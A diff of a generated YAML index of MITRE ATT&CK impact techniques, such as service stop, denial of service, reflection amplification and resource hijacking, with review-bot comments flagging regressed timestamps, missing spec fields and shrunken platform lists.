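Review bot: the FireEye APT38 citation in T1565.001 changes host from content.fireeye.com to a Mandiant PDF (rpt-apt38-2018-web_v5-1.pdf) while its description still says "Retrieved November 6, 2018"; acceptable if it is the same report, but the retrieval date now describes a URL that did not exist then, so consider refreshing it along with the URL. The T1489 description edit is punctuation only (the full stop moves before the Novetta citation); the hard line break after `MSExchangeIS` is present in both the old and new text and looks like stripped inline markup, so it is not introduced by this patch, but it is worth fixing at the generator since it splits a YAML double-quoted scalar across an unexpected line.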
@@ -57794,10 +58549,14 @@ impact:
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW
may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Process: Process Termination'
@@ -57808,39 +58567,37 @@ impact:
- 'Service: Service Metadata'
x_mitre_impact_type:
- Availability
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+ created: '2019-03-29T19:00:55.901Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1489
+ external_id: T1489
+ - source_name: SecureWorks WannaCry Analysis
+ description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+ Analysis. Retrieved March 26, 2019.
+ url: https://www.secureworks.com/research/wcry-ransomware-analysis
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Novetta Blockbuster
+ description: 'Novetta Threat Research Group. (2016, February 24). Operation
+ Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+ 25, 2016.'
+ url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1489
atomic_tests: []
T1499.004:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
- type: attack-pattern
- created: '2020-02-20T15:37:27.052Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1499.004
- url: https://attack.mitre.org/techniques/T1499/004
- - source_name: Sucuri BIND9 August 2015
- url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
- description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
- in the Wild. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T15:42:23.001Z'
name: Application or System Exploitation
description: "Adversaries may exploit software vulnerabilities that can cause
an application or system to crash and deny availability to users. (Citation:
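Review bot: `identifier: T1489` survives as a context line, and no other technique in this region carries an `identifier` key (each goes straight from `technique:` to `atomic_tests:`), so the schema is uneven; this is pre-existing, but since the generator output is being reshaped anyway, either emit `identifier` for every entry or drop it here so consumers do not special-case one technique. The rest of the hunk is the same id-ordered re-emission of T1489's references and the start of T1499.004's, with the url/external_id pair order flipped, which is harmless.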
@@ -57858,13 +58615,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Attacks targeting web applications may generate logs in the
web server, application server, and/or database server that can be used to
identify the type of attack. Externally monitor the availability of services
that may be targeted by an Endpoint DoS.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
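Review bot: the T1499.004 platform list shrinks from eight entries to `Windows`, `IaaS`, `Linux`, `macOS` with only a minor version bump (`'1.2'` to `'1.3'`). The removed `Azure AD`, `Office 365`, `SaaS` and `Google Workspace` entries get no replacement here, whereas T1657 and T1531 later in this diff receive `Office Suite` for the same removals; confirm the upstream object really dropped all four for this sub-technique rather than the generator carrying a stale platform list.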
@@ -57872,36 +58636,27 @@ impact:
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1565.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
type: attack-pattern
- created: '2020-03-02T14:30:05.252Z'
+ id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+ created: '2020-02-20T15:37:27.052Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.003
- url: https://attack.mitre.org/techniques/T1565/003
- - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- url: https://content.fireeye.com/apt/rpt-apt38
- source_name: FireEye APT38 Oct 2018
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1499/004
+ external_id: T1499.004
+ - source_name: Sucuri BIND9 August 2015
+ description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+ in the Wild. Retrieved April 26, 2019.
+ url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1565.003:
+ technique:
+ modified: '2024-10-15T18:21:43.760Z'
name: Runtime Data Manipulation
description: |-
Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
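Review bot: the hunk ending here deletes `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id` and `created` for T1565.003 only to re-add the identical values lower in the same object, so a change of a few platforms and a date reads as a fifty-line rewrite. Emitting keys in a fixed order (for example `sort_keys=True` in the dumper, or the order the upstream bundle uses) would make these regenerations reviewable.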
@@ -57910,11 +58665,17 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Inspect important application binary file hashes, locations,
and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'File: File Deletion'
@@ -57923,17 +58684,31 @@ impact:
- 'File: File Creation'
x_mitre_impact_type:
- Integrity
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+ created: '2020-03-02T14:30:05.252Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/003
+ external_id: T1565.003
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1498.002:
technique:
- modified: '2023-03-30T21:01:41.052Z'
+ modified: '2024-10-15T16:04:34.495Z'
name: Reflection Amplification
description: |-
Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
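Review bot: `x_mitre_permissions_required` (`User`, `Administrator`, `root`, `SYSTEM`) is removed from T1565.003 in the hunk above without any replacement field. Check whether an index or report generator still reads that key, and if the field has been retired upstream make sure it disappears from the other techniques in the same regeneration so the file stays uniform.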
@@ -57942,6 +58717,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
before the traffic volume is sufficient to cause impact to the availability
of the service, but such response time typically requires very aggressive
@@ -57957,17 +58733,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Sensor Health: Host Status'
- 'Network Traffic: Network Traffic Flow'
@@ -57977,14 +58748,15 @@ impact:
id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
created: '2020-03-02T20:08:03.691Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1498/002
external_id: T1498.002
- - source_name: Cloudflare ReflectionDoS May 2017
- description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
- (attacks). Retrieved April 23, 2019.
- url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- source_name: Cloudflare DNSamplficationDoS
description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
April 23, 2019.
@@ -57993,28 +58765,28 @@ impact:
description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
April 23, 2019.
url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+ - source_name: Cloudflare ReflectionDoS May 2017
+ description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+ (attacks). Retrieved April 23, 2019.
+ url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cloudflare Memcrashed Feb 2018
+ description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+ - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+ url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- source_name: Arbor AnnualDoSreport Jan 2018
description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
Infrastructure Security Report. Retrieved April 22, 2019.
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- - source_name: Cloudflare Memcrashed Feb 2018
- description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
- - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
- url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- - source_name: Cisco DoSdetectNetflow
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1499.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:05:48.014Z'
name: Service Exhaustion Flood
description: |-
Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
@@ -58025,7 +58797,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -58036,17 +58807,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -58083,7 +58849,8 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491:
technique:
@@ -58104,7 +58871,7 @@ impact:
- source_name: mitre-attack
external_id: T1491
url: https://attack.mitre.org/techniques/T1491
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:42.056Z'
name: Defacement
description: "Adversaries may modify visual content available internally or
externally to an enterprise network, thus affecting the integrity of the original
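Review bot: the `modified` timestamp for T1491 moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-03-25T19:34:42.056Z`, while the other techniques in this diff move forward to October 2024. A regressing `modified` usually means the object was taken from a different bundle than its neighbours, and anything that compares `modified` to decide whether to refresh a technique will treat this entry as stale. Confirm the source bundle before merging.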
@@ -58131,12 +58898,78 @@ impact:
x_mitre_impact_type:
- Integrity
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ atomic_tests: []
+ T1496.002:
+ technique:
+ modified: '2024-09-25T14:59:35.287Z'
+ name: Bandwidth Hijacking
+ description: "Adversaries may leverage the network bandwidth resources of co-opted
+ systems to complete resource-intensive tasks, which may impact system and/or
+ hosted service availability. \n\nAdversaries may also use malware that leverages
+ a system's network bandwidth as part of a botnet in order to facilitate [Network
+ Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+ to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+ in proxyjacking by selling use of the victims' network bandwidth and IP address
+ to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+ in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+ Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+ financial costs or availability disruptions, this technique may cause reputational
+ damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+ Proxyjacking)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - IaaS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'File: File Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Connection Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+ created: '2024-09-25T13:44:35.412Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/002
+ external_id: T1496.002
+ - source_name: Sysdig Proxyjacking
+ description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+ Chat. Retrieved July 6, 2023.
+ url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+ - source_name: Unit 42 Leaked Environment Variables 2024
+ description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+ Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+ Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+ url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+ - source_name: GoBotKR
+ description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+ Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+ url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1657:
technique:
- modified: '2024-04-11T20:22:14.359Z'
+ modified: '2024-10-15T15:58:10.254Z'
name: Financial Theft
description: "Adversaries may steal monetary resources from targets through
extortion, social engineering, technical theft, or other methods aimed at
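Review bot: T1491 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` at the top of this hunk and, unlike T1499.004 and T1565.003 above, gets no `x_mitre_attack_spec_version: 3.2.0` in return, so the object is left with no spec version marker at all. Together with its backwards `modified` date this looks like a partially refreshed object; either regenerate T1491 from the same bundle as the rest or explain why it differs.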
@@ -58169,7 +59002,7 @@ impact:
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
- Pawel Partyka, Microsoft Threat Intelligence
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -58179,10 +59012,9 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
@@ -58245,7 +59077,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1491.001:
technique:
@@ -58286,7 +59117,7 @@ impact:
messages. Since internally defacing systems exposes an adversary''s presence,
it often takes place after other intrusion goals have been accomplished.(Citation:
Novetta Blockbuster Destructive Malware)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-28T18:55:35.988Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Defacement: Internal Defacement'
x_mitre_detection: Monitor internal and websites for unplanned content changes.
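Review bot: the same `modified` regression as T1491 appears here for T1491.001, from `2022-11-08T14:00:00.188Z` back to `2022-07-28T18:55:35.988Z`, and the context lines just below still show `x_mitre_attack_spec_version: 2.1.0`, so this object was not refreshed to 3.2.0 like the others. Worth confirming that the generator is not mixing objects from two bundle versions.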
@@ -58307,9 +59138,157 @@ impact:
- Integrity
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1491.001
atomic_tests: []
+ T1496.004:
+ technique:
+ modified: '2024-10-16T17:59:27.535Z'
+ name: Cloud Service Hijacking
+ description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+ applications to complete resource-intensive tasks, which may impact hosted
+ service availability. \n\nFor example, adversaries may leverage email and
+ messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+ Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+ spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+ messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+ 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+ in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+ AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+ 2024)\n\nIn some cases, adversaries may leverage services that the victim
+ is already using. In others, particularly when the service is part of a larger
+ cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+ 2024) Leveraging SaaS applications may cause the victim to incur significant
+ financial costs, use up service quotas, and otherwise impact availability. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+ created: '2024-09-25T14:05:59.910Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/004
+ external_id: T1496.004
+ - source_name: SentinelLabs SNS Sender 2024
+ description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+ Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+ url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+ - source_name: Lacework LLMJacking 2024
+ description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+ with Composite Alerts. Retrieved September 25, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+ - source_name: Sysdig LLMJacking 2024
+ description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+ (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+ - source_name: Permiso SES Abuse 2023
+ description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+ 25, 2024.
+ url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.001:
+ technique:
+ modified: '2024-10-13T16:58:38.820Z'
+ name: Compute Hijacking
+ description: "Adversaries may leverage the compute resources of co-opted systems
+ to complete resource-intensive tasks, which may impact system and/or hosted
+ service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ is to validate transactions of cryptocurrency networks and earn virtual currency.
+ Adversaries may consume enough system resources to negatively impact and/or
+ cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+ Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+ because of the high potential for available resources, but user endpoint systems
+ may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+ environments may also be targeted due to the ease of deployment via exposed
+ APIs and the potential for scaling mining activities by deploying or compromising
+ multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+ Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+ cryptocurrency mining malware identify then kill off processes for competing
+ malware to ensure it’s not competing for resources.(Citation: Trend Micro
+ War of Crypto Miners)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Network Traffic: Network Connection Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Sensor Health: Host Status'
+ - 'Process: Process Creation'
+ - 'File: File Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+ created: '2024-09-25T13:34:30.100Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/001
+ external_id: T1496.001
+ - source_name: Unit 42 Hildegard Malware
+ description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+ Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+ url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+ - source_name: CloudSploit - Unused AWS Regions
+ description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+ Retrieved October 8, 2019.
+ url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+ - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+ description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+ 17, 2019.
+ url: https://securelist.com/lazarus-under-the-hood/77908/
+ - source_name: Trend Micro Exposed Docker APIs
+ description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+ via Exposed APIs. Retrieved April 6, 2021.
+ url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+ - source_name: Trend Micro War of Crypto Miners
+ description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+ Miners: A Battle for Resources. Retrieved April 6, 2021.'
+ url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1565:
technique:
modified: '2024-02-02T17:18:39.004Z'
